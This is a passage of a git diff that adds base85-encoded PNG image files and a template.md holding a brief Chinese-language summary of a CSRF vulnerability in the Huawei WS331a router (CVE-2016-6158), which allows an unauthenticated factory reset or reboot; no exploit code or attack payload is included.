zV3B!%3v9w<$9myBw@o<=X#l&|2cx!wk9%<6z-^6Q+_D5|Wkf;Wwf1Jn<eM>U1J;$+
zMhd6c0NZcIRd?GLV4$1|c?q6n!|vt0?!5y*71^cfV1of#9LOg01Lxdg@&KLbxX&Sy
z^db^*C+rP`nhd%&1z|W)<`|0}tnKzSsUoEtrqs5h<OBO)$IEG%j))ICg9E!Sq<4fD
zU#j=?p!=TCef|;CZhFyQSlH;vQRbl9xbd4n{-@T7)0#C=q~Xuc#FGKE*Pf6z%OPyZ
zytt}M4f69<>%Abt%ruvI=MPq(qZ6^8`JZV`1`X={SGO%~{TKTG1zhxBCjS2g1^>S_
f*>o|n{`}Hk{QQX5{-FLpZqR*Uq*?RKDf)i_Vp}g9

literal 0
HcmV?d00001

diff --git a/img/3.png b/img/3.png
new file mode 100644
index 0000000000000000000000000000000000000000..1ab3e39b8c8e4beaa1889bde58a7b0888ddbac9c
GIT binary patch
literal 12720
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

literal 0
HcmV?d00001

diff --git a/template.md b/template.md
new file mode 100644
index 0000000..2a4555d
--- /dev/null
+++ b/template.md
@@ -0,0 +1,27 @@
+### 漏洞简介  
+
+#### 漏洞概述  
+
+> 华为WS331a 是一款便携无线路由器。
+> WS331a产品的管理页面中存在一个CSRF漏洞，未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞，攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
+> 此漏洞的CVE编号为：CVE-2016-6158。  
+
